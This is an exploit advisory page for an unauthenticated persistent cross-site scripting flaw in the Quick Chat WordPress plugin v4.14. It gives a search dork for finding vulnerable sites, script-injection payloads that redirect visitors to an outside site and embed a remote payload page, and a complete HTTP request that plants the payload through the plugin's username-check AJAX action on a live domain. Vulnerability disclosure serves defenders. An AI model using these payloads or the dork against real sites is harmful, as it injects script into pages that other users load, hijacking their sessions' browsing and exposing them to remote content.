Quick Chat plugin v4.14 - Unauthenticated Persistent XSS

2020.11.12
ru Ex.Mi (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] :: Exploit Title: Quick Chat plugin v4.14 - Unauthenticated Persistent XSS [+] :: Google Dork: inurl:/wp-content/plugins/quick-chat/ [+] :: Date: 2020-10-06 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Marko Martinović [ http://www.techytalk.info ] [+] :: Software Version: 4.14 [+] :: Software Link: https://wordpress.org/plugins/quick-chat/ [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Persistent XSS vulnerability was discovered in the Quick Chat plugin v4.14 for WordPress. Also was discovered an Authenticated Persistent XSS vulnerability on the Quick Chat options page in the admin dashboard (/wp-admin/options-general.php?page=quick-chat/quick-chat.php), vulnerable fields: «Chat name prefix for guest users», «Advertisement code for your AdSense». [$] :: Payloads: <!-->"><script>console.log(`Done!`);location=`https://ex-mi.ru/`;</script>"><embed src=//ex-mi.ru/payload/xfsii.html> <!-->"><!--><embed src=//ex-mi.ru> [!] :: PoC (Burp Suite): POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.techytalk.info Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 507 Referer: http://www.techytalk.info/wordpress/quick-chat/ Cookie: quick_chat_alias=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E; action=quick-chat-ajax-username-check&username_check=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi

References:

https://ex-mi.ru/exploit/[2020-10-06]-[WordPress]-quick-chat-plugin-v4.14.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-10-06%5D-%5BWordPress%5D-quick-chat-plugin-v4.14.txt
https://wordpress.org/plugins/quick-chat/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top